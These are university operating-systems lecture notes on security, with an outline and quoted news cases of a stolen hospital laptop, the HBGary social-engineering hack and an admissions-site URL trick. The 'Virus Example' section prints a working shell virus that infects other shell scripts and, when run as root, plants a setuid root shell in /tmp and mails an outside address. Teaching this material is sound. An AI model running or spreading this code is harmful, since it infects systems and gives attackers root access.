Operating Systems Lecture Notes

2014 December 4 • Security


Outline

What is Security?

The Security Game

Security Threats

Security Attacks

Security Defenses

Security Defense Architectures

Security Defense Concepts

Thinking About Security

Thinking About Risk

Risk Example

Using Risk

Attack Categories

Physical Example.

Medical records and other data may have been compromised for at least 500 patients at Cedars-Sinai Medical Center in Los Angeles, the hospital said Friday, after an employee’s laptop computer was stolen.

The laptop’s hard drive may have had some combination of patient data, including information about lab testing, treatment and diagnosis, Cedars-Sinai said in a statement. Some files also contained patient Social Security numbers and other personal information.

— Chad Garland, Cedars-Sinai reports possible breach of patients' medical data
Los Angles Times, 2014 August 22

Physical Example..

A data breach this summer involving Cedars-Sinai Medical Center patient records was much worse than previously disclosed.

The Los Angeles hospital has notified state and federal officials that medical records of more than 33,000 patients were on a laptop stolen from an employee’s home during a June burglary. [...]

Cedars-Sinai had said in August that the laptop contained the records of at least 500 patients. After consulting a data forensics firm, the hospital increased the number of patients affected to 33,136.

— Stuart Pfeifer, Cedars-Sinai says number of patient files in data breach much higher,
Los Angles Times, 2014 October 1

Social Example

A key part of the hack against HBGary involved the impersonation of Barr in an exchange of emails with an IT administrator (Nokia security specialist Jussi Jaakonaho) in order to gain access to HBGary’s servers. The hacker, who used social engineering trickery to persuade Jaakonaho to drop security defences and allow in-bound connections, has since identified herself as a 16-year-old girl called Kayla in an interview with Forbes.

— John Leyden, HBGary’s nemesis is a ‘16-year-old schoolgirl’,
The Register, 2011 March 17

Program Attacks

Virus Example

#!/bin/sh
(for i in * /bin/* /usr/bin/* /u*/*/bin/* ; do 
   if sed 1q $i | grep '^#![:space:]*/bin/sh'
   then if grep '^# mark$' $i ;  then:
   else trap "rm -f /tmp/x$$" 0 1 2 13 15
     sed 1q $i >/tmp/x$$
     sed '1d
	     /^# mark$/q' $0 >>/tmp/x$$
     sed 1d $i >>/tmp/x$$
     cp /tmp/x$$ $i
     fi
   fi
 done
 if ls -l /tmp/x$$ | grep root ; then 
   rm /tmp/gift
   cp /bin/sh /tmp/gift
   chmod 4777 /tmp/gift
   echo gift | mail joe@chicago
 fi
 rm /tmp/x$$
) >/dev/null 2>/dev/null &
# mark

Combinatorics Example

HBS interacts with applicants via a third-party site called ApplyYourself. Harvard had planned to notify applicants whether they had been admitted, on March 30. Somebody discovered last week that some applicants’ admit/reject letters were already available on the ApplyYourself website. There were no hyperlinks to the letters, but a student who was logged in to the site could access his/her letter by constructing a special URL. Instructions for doing this were posted in an online forum frequented by HBS applicants.

— Edward Felton, Harvard Business School Boots 119 Applicants for “Hacking” Into Admissions Site,
Freedom to Tinker, 2005 March 9

Summary

References


This page last modified on 2012 January 30.

Creative
    Commons License